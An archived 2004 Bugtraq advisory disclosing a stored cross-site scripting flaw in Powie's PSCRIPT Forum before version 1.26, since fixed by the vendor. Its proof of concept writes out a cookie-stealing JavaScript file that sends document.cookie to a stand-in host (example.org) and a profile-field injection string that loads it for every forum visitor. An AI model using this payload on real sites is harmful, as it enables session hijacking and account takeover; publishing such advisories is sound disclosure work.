lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <21347069.1092526499098.JavaMail.ngmail@webmail08.arcor-online.net>
Date: Sun, 15 Aug 2004 01:34:59 +0200 (CEST)
From: Christoph Jeschke <ponders.bugtraq@...or.de>
To: bugtraq@...urityfocus.com
Subject: pscript.de PFORUM XSS Vulnerability


Summary
+-----+
Product             Powie's PSCRIPT Forum
Version             All versions before 1.26 
OS                  All with PHP and mySQL.
Vendor URL          www.pscript.de
Vendor Status       informed
Security Risk Lvl   high
Remote Exploit      yes

Introduction
+----------+
pforum is a BBS, similar to phpBB or other. The author provides
users possibility to enrich their profiles with personal data. Although
the author tries to eliminate malicious code (like unwanted html code) 
in the inputs, two of the fields are not handled secure. Therefore it's
possible to steal cookies or do other nasty things. 

More Details
+----------+
If you login into your account, pforum saves your user id, your password
and the PHP session id. If somebody redirects you, for example using 
javascript, he can append all this data as a query string to the target 
URL. Then he can easily using your PHP session id for hijacking your 
pforum session. If he creates or modifies two cookies with the user id
or the crypted password, he can easily hijack your account only by visiting
the pforum.

Proof of Concept
+--------------+
Create a Javascript file and save it as bad.js (your domain name is in this
case example.org). The file contains the following code:

// bad.js
function b()
{
    location.href='example.org/compute_stolen_data.ext?'+document.cookie;
}

Edit your profile and enter the following line into the the IRC Server or AIM
ID Input Box. The string have to be shorter then 100 characters.

// Input Box (without line break)
"><script src=http://example.org/bad.js></script>
<img height=0 width=0 src=foo onerror=b(); >

Post a lot. Because the picture can't be found and the onError Event Handler
catches this, every user with activated javascript will be automagically
redirected to http://example.org/compute_stolen_data.ext. All cookie values
will be appended to the URL.

Security Risk
+-----------+
Critical. You can get administrator or moderator of the forum.

Vendor
+----+
The Vendor reacted quickly and fixed the vulnerability satisfactorily in a new
version of the pforum (1.26).


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ